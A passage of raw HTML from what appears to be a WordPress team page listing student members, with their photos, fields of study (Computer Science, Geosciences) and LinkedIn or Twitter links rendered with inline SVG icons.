style-918-frameImage style-local-182-c263-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c264\" class=\"h-global-transition-all h-heading style-914 style-local-182-c264 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c264\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c265\" class=\"h-text h-text-component style-915 style-local-182-c265 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c267\" class=\"style-919 style-local-182-c267 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c268-outer\">\n            <div data-colibri-id=\"182-c268\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c268 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c269\" class=\"d-block style-920 style-local-182-c269 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c269-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c269-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c270\" class=\"h-global-transition-all h-heading style-914 style-local-182-c270 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c270\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c271\" class=\"h-text h-text-component style-915 style-local-182-c271 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c273\" class=\"style-921 style-local-182-c273 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c274-outer\">\n            <div data-colibri-id=\"182-c274\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c274 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c275\" class=\"d-block style-922 style-local-182-c275 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c275-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c275-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c276\" class=\"h-global-transition-all h-heading style-914 style-local-182-c276 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c276\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c277\" class=\"h-text h-text-component style-915 style-local-182-c277 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c279\" class=\"style-923 style-local-182-c279 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c385-outer\">\n            <div data-colibri-id=\"182-c385\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c385 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c386\" class=\"d-block style-913 style-local-182-c386 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c386-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c386-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c387\" class=\"h-global-transition-all h-heading style-914 style-local-182-c387 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c387\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c388\" class=\"h-text h-text-component style-915 style-local-182-c388 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c389\" class=\"style-917 style-local-182-c389 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c390-outer\">\n            <div data-colibri-id=\"182-c390\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c390 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c391\" class=\"d-block style-913 style-local-182-c391 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c391-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c391-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c392\" class=\"h-global-transition-all h-heading style-914 style-local-182-c392 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c392\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c393\" class=\"h-text h-text-component style-915 style-local-182-c393 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c394\" class=\"style-917 style-local-182-c394 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c395-outer\">\n            <div data-colibri-id=\"182-c395\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c395 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c396\" class=\"d-block style-913 style-local-182-c396 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c396-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c396-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c397\" class=\"h-global-transition-all h-heading style-914 style-local-182-c397 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c397\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c398\" class=\"h-text h-text-component style-915 style-local-182-c398 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c399\" class=\"style-917 style-local-182-c399 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c400-outer\">\n            <div data-colibri-id=\"182-c400\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c400 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c401\" class=\"d-block style-913 style-local-182-c401 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c401-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c401-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c402\" class=\"h-global-transition-all h-heading style-914 style-local-182-c402 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c402\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c403\" class=\"h-text h-text-component style-915 style-local-182-c403 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c405-outer\">\n            <div data-colibri-id=\"182-c405\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c405 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c406\" class=\"d-block style-913 style-local-182-c406 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c406-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c406-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c407\" class=\"h-global-transition-all h-heading style-914 style-local-182-c407 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c407\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c408\" class=\"h-text h-text-component style-915 style-local-182-c408 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c409\" class=\"style-917 style-local-182-c409 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer 